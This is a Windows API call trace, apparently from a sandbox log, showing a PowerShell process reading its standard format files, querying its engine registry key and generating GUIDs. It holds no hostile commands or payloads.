	[0762.354] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.355] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.355] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.356] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.356] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.356] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.357] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.357] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.358] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.358] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.358] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.359] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.359] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.359] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.360] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.360] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0762.360] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0xf37, lpOverlapped=0x0) returned 1
	[0762.361] ReadFile (in: hFile=0x314, lpBuffer=0x33481ff, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33481ff*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0762.361] ReadFile (in: hFile=0x314, lpBuffer=0x3348b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x3348b60*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0762.361] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cda8 | out: phkResult=0x14cda8*=0x314) returned 0x0
	[0762.361] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cd2c, lpData=0x0, lpcbData=0x14cd28*=0x0 | out: lpType=0x14cd2c*=0x1, lpData=0x0, lpcbData=0x14cd28*=0x56) returned 0x0
	[0762.362] CoTaskMemAlloc (cb=0x5a) returned 0x1b73d620
	[0762.362] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ccfc, lpData=0x1b73d620, lpcbData=0x14ccf8*=0x56 | out: lpType=0x14ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ccf8*=0x56) returned 0x0
	[0762.362] CoTaskMemFree (pv=0x1b73d620) 
	[0762.362] RegCloseKey (hKey=0x314) returned 0x0
	[0762.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0762.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0762.367] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xfea63738, Data2=0xbeb1, Data3=0x44d9, Data4=([0]=0xba, [1]=0x3e, [2]=0x85, [3]=0x3d, [4]=0x86, [5]=0x92, [6]=0xec, [7]=0xa2))) returned 0x0
	[0762.367] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x61f5120d, Data2=0xb4f7, Data3=0x4db4, Data4=([0]=0xab, [1]=0x6, [2]=0x7c, [3]=0x59, [4]=0x3e, [5]=0x68, [6]=0xb6, [7]=0x7e))) returned 0x0
	[0763.314] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x50741ef1, Data2=0xc326, Data3=0x4299, Data4=([0]=0x9c, [1]=0x32, [2]=0xe0, [3]=0x6e, [4]=0xfb, [5]=0xae, [6]=0xa0, [7]=0x7a))) returned 0x0
	[0763.338] VirtualQuery (in: lpAddress=0x14b7e0, lpBuffer=0x14c6a0, dwLength=0x30 | out: lpBuffer=0x14c6a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0763.338] VirtualQuery (in: lpAddress=0x14b750, lpBuffer=0x14c610, dwLength=0x30 | out: lpBuffer=0x14c610*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0763.339] VirtualQuery (in: lpAddress=0x14b7e0, lpBuffer=0x14c6a0, dwLength=0x30 | out: lpBuffer=0x14c6a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0763.340] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xe9cb7fff, Data2=0x968c, Data3=0x4112, Data4=([0]=0x9f, [1]=0xfb, [2]=0x7, [3]=0xcd, [4]=0xc8, [5]=0xde, [6]=0x3a, [7]=0x76))) returned 0x0
	[0763.342] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xef0501ed, Data2=0x925e, Data3=0x4851, Data4=([0]=0xbd, [1]=0x4, [2]=0xd0, [3]=0x20, [4]=0x23, [5]=0xd7, [6]=0xbe, [7]=0xd8))) returned 0x0
	[0763.342] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x8c9b8500, Data2=0xc2fe, Data3=0x4f12, Data4=([0]=0xa8, [1]=0x5b, [2]=0xb7, [3]=0xc, [4]=0x69, [5]=0x2b, [6]=0xa2, [7]=0xaa))) returned 0x0
	[0763.346] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xfe53df88, Data2=0x697, Data3=0x4bdd, Data4=([0]=0xbf, [1]=0x2c, [2]=0xee, [3]=0xb6, [4]=0xa2, [5]=0xef, [6]=0xd6, [7]=0x82))) returned 0x0
	[0763.346] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x203fdf8f, Data2=0x38ca, Data3=0x41e7, Data4=([0]=0xbb, [1]=0x91, [2]=0x75, [3]=0xaf, [4]=0x24, [5]=0x45, [6]=0x42, [7]=0x7b))) returned 0x0
	[0763.347] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x22d4deeb, Data2=0x5768, Data3=0x4f36, Data4=([0]=0xae, [1]=0x61, [2]=0x14, [3]=0x0, [4]=0xab, [5]=0x86, [6]=0xaa, [7]=0xd8))) returned 0x0
	[0763.347] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xd9d11b6e, Data2=0xdeaf, Data3=0x45b4, Data4=([0]=0x9a, [1]=0x4e, [2]=0xc1, [3]=0x48, [4]=0xac, [5]=0x40, [6]=0x8, [7]=0xb))) returned 0x0
	[0763.347] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xc4b2c4a, Data2=0x2a8e, Data3=0x4dfa, Data4=([0]=0x81, [1]=0x82, [2]=0x1f, [3]=0xb6, [4]=0x72, [5]=0x3c, [6]=0xe3, [7]=0xf8))) returned 0x0
	[0763.348] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x718e8fe0, Data2=0x8ed6, Data3=0x4213, Data4=([0]=0x98, [1]=0x9, [2]=0x29, [3]=0x9c, [4]=0x3c, [5]=0x5c, [6]=0x59, [7]=0x93))) returned 0x0
	[0763.348] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x9a942efb, Data2=0x7f25, Data3=0x4ac7, Data4=([0]=0xbe, [1]=0x24, [2]=0x6a, [3]=0xac, [4]=0x25, [5]=0x7e, [6]=0x8e, [7]=0x23))) returned 0x0
	[0763.348] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xf08b135f, Data2=0x542a, Data3=0x40d9, Data4=([0]=0x9f, [1]=0x2a, [2]=0x82, [3]=0x96, [4]=0x94, [5]=0x2f, [6]=0xb3, [7]=0x5))) returned 0x0
	[0763.348] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x8409e131, Data2=0xab84, Data3=0x4231, Data4=([0]=0x87, [1]=0xeb, [2]=0x8c, [3]=0xc5, [4]=0x93, [5]=0x82, [6]=0x84, [7]=0xcd))) returned 0x0
	[0763.350] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x3843045a, Data2=0xbeef, Data3=0x44d9, Data4=([0]=0xbe, [1]=0x78, [2]=0x3f, [3]=0x1b, [4]=0x73, [5]=0x4b, [6]=0x39, [7]=0x77))) returned 0x0
	[0763.351] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x335e869a, Data2=0x540, Data3=0x41d8, Data4=([0]=0xa9, [1]=0x3a, [2]=0xb1, [3]=0xbe, [4]=0xf, [5]=0xac, [6]=0xc0, [7]=0xb7))) returned 0x0
	[0763.352] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x57d8661b, Data2=0x9151, Data3=0x48fd, Data4=([0]=0x95, [1]=0xd8, [2]=0x70, [3]=0x94, [4]=0xa2, [5]=0x4f, [6]=0xf3, [7]=0x55))) returned 0x0
	[0763.352] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xc1dd4ffa, Data2=0x40bd, Data3=0x4427, Data4=([0]=0x89, [1]=0x6c, [2]=0xbc, [3]=0x8b, [4]=0xc7, [5]=0xaf, [6]=0xdb, [7]=0xa7))) returned 0x0
	[0763.353] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x11790148, Data2=0xc90, Data3=0x4e2a, Data4=([0]=0x98, [1]=0x9d, [2]=0x96, [3]=0x4a, [4]=0xea, [5]=0xf8, [6]=0x77, [7]=0x44))) returned 0x0
	[0763.353] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xbc0a7a00, Data2=0x4be7, Data3=0x4ac6, Data4=([0]=0x88, [1]=0x36, [2]=0x3, [3]=0x1f, [4]=0x83, [5]=0x58, [6]=0xa1, [7]=0x2b))) returned 0x0
	[0763.353] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x146b22b7, Data2=0xb37d, Data3=0x4238, Data4=([0]=0xb1, [1]=0x15, [2]=0x64, [3]=0x2a, [4]=0x72, [5]=0xbd, [6]=0xa1, [7]=0xc8))) returned 0x0
	[0763.354] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xdbb0c825, Data2=0x8fd6, Data3=0x47ab, Data4=([0]=0xbb, [1]=0x7e, [2]=0x52, [3]=0x77, [4]=0x3, [5]=0xf3, [6]=0xbd, [7]=0x84))) returned 0x0
	[0763.354] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x5c2e0c7b, Data2=0x67a, Data3=0x4b03, Data4=([0]=0x90, [1]=0x78, [2]=0x60, [3]=0x3b, [4]=0x7b, [5]=0x8c, [6]=0x71, [7]=0x78))) returned 0x0
	[0763.354] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x1c71cb64, Data2=0xb849, Data3=0x4f68, Data4=([0]=0xb5, [1]=0xd4, [2]=0x9b, [3]=0x85, [4]=0x7, [5]=0x7c, [6]=0xa5, [7]=0x8a))) returned 0x0
	[0763.354] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0763.355] GetFileType (hFile=0x314) returned 0x1
	[0763.355] SetErrorMode (uMode=0x1) returned 0x1
	[0763.355] GetFileType (hFile=0x314) returned 0x1
	[0763.355] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0763.355] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0763.355] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0763.355] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0763.356] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0763.356] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0763.356] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0763.356] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0763.356] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.478] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.478] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.478] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.478] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.479] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.479] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.479] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.479] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.480] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.480] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.481] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.481] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0764.481] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0xe67, lpOverlapped=0x0) returned 1
	[0764.482] ReadFile (in: hFile=0x314, lpBuffer=0x31a22bf, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a22bf*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0764.482] ReadFile (in: hFile=0x314, lpBuffer=0x31a2cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x31a2cf0*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0764.482] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cda8 | out: phkResult=0x14cda8*=0x314) returned 0x0
	[0764.483] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cd2c, lpData=0x0, lpcbData=0x14cd28*=0x0 | out: lpType=0x14cd2c*=0x1, lpData=0x0, lpcbData=0x14cd28*=0x56) returned 0x0
	[0764.483] CoTaskMemAlloc (cb=0x5a) returned 0x1b73d620
	[0764.483] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ccfc, lpData=0x1b73d620, lpcbData=0x14ccf8*=0x56 | out: lpType=0x14ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ccf8*=0x56) returned 0x0
	[0764.483] CoTaskMemFree (pv=0x1b73d620) 
	[0764.483] RegCloseKey (hKey=0x314) returned 0x0
	[0764.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0764.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0764.485] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x5c5516fe, Data2=0x80ba, Data3=0x4994, Data4=([0]=0x9f, [1]=0xb7, [2]=0x3f, [3]=0x7c, [4]=0x44, [5]=0xef, [6]=0x45, [7]=0xea))) returned 0x0
	[0764.485] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x58b90fc5, Data2=0x38e, Data3=0x4c75, Data4=([0]=0xbc, [1]=0xe0, [2]=0x9, [3]=0x22, [4]=0x70, [5]=0x10, [6]=0xf3, [7]=0x84))) returned 0x0
	[0764.485] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x47cf65cc, Data2=0x7458, Data3=0x47da, Data4=([0]=0xb1, [1]=0x9, [2]=0xa1, [3]=0x2a, [4]=0x14, [5]=0xd2, [6]=0x41, [7]=0xc0))) returned 0x0
	[0764.485] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xd12254e7, Data2=0xbdfe, Data3=0x4f03, Data4=([0]=0x9a, [1]=0x20, [2]=0x2c, [3]=0xdf, [4]=0xbb, [5]=0x72, [6]=0x8, [7]=0xc9))) returned 0x0
	[0764.486] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x2b286695, Data2=0xe47f, Data3=0x43aa, Data4=([0]=0x80, [1]=0x3c, [2]=0x4a, [3]=0x98, [4]=0xf7, [5]=0xb0, [6]=0x1a, [7]=0xf1))) returned 0x0
	[0764.486] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xf3d845d2, Data2=0xa2c0, Data3=0x459c, Data4=([0]=0xaa, [1]=0x4b, [2]=0x78, [3]=0x13, [4]=0xc, [5]=0x35, [6]=0xa8, [7]=0x2b))) returned 0x0
	[0764.486] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x3963ca49, Data2=0x5545, Data3=0x4caa, Data4=([0]=0xbd, [1]=0x99, [2]=0xd, [3]=0xf6, [4]=0x8a, [5]=0xdd, [6]=0x4a, [7]=0x79))) returned 0x0
	[0764.486] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xeaf9ec66, Data2=0x2cce, Data3=0x4e36, Data4=([0]=0x89, [1]=0x27, [2]=0xb0, [3]=0xbc, [4]=0x2a, [5]=0xe3, [6]=0x63, [7]=0x4e))) returned 0x0
	[0764.486] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x63eb4450, Data2=0x4ed8, Data3=0x4aea, Data4=([0]=0xbe, [1]=0x41, [2]=0x11, [3]=0xc6, [4]=0x8, [5]=0xb0, [6]=0x83, [7]=0x43))) returned 0x0
	[0764.487] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x6417369e, Data2=0x195c, Data3=0x4325, Data4=([0]=0x9c, [1]=0xde, [2]=0xe6, [3]=0xf, [4]=0xc9, [5]=0x48, [6]=0x91, [7]=0x53))) returned 0x0
	[0764.487] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xf5404cf2, Data2=0xed61, Data3=0x4b95, Data4=([0]=0xb6, [1]=0xdf, [2]=0xad, [3]=0xa6, [4]=0xfe, [5]=0x22, [6]=0x63, [7]=0x91))) returned 0x0
	[0764.487] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x6bffe6c5, Data2=0x8b1d, Data3=0x4a7a, Data4=([0]=0xad, [1]=0x65, [2]=0x42, [3]=0xcb, [4]=0x41, [5]=0x94, [6]=0xd5, [7]=0x9c))) returned 0x0
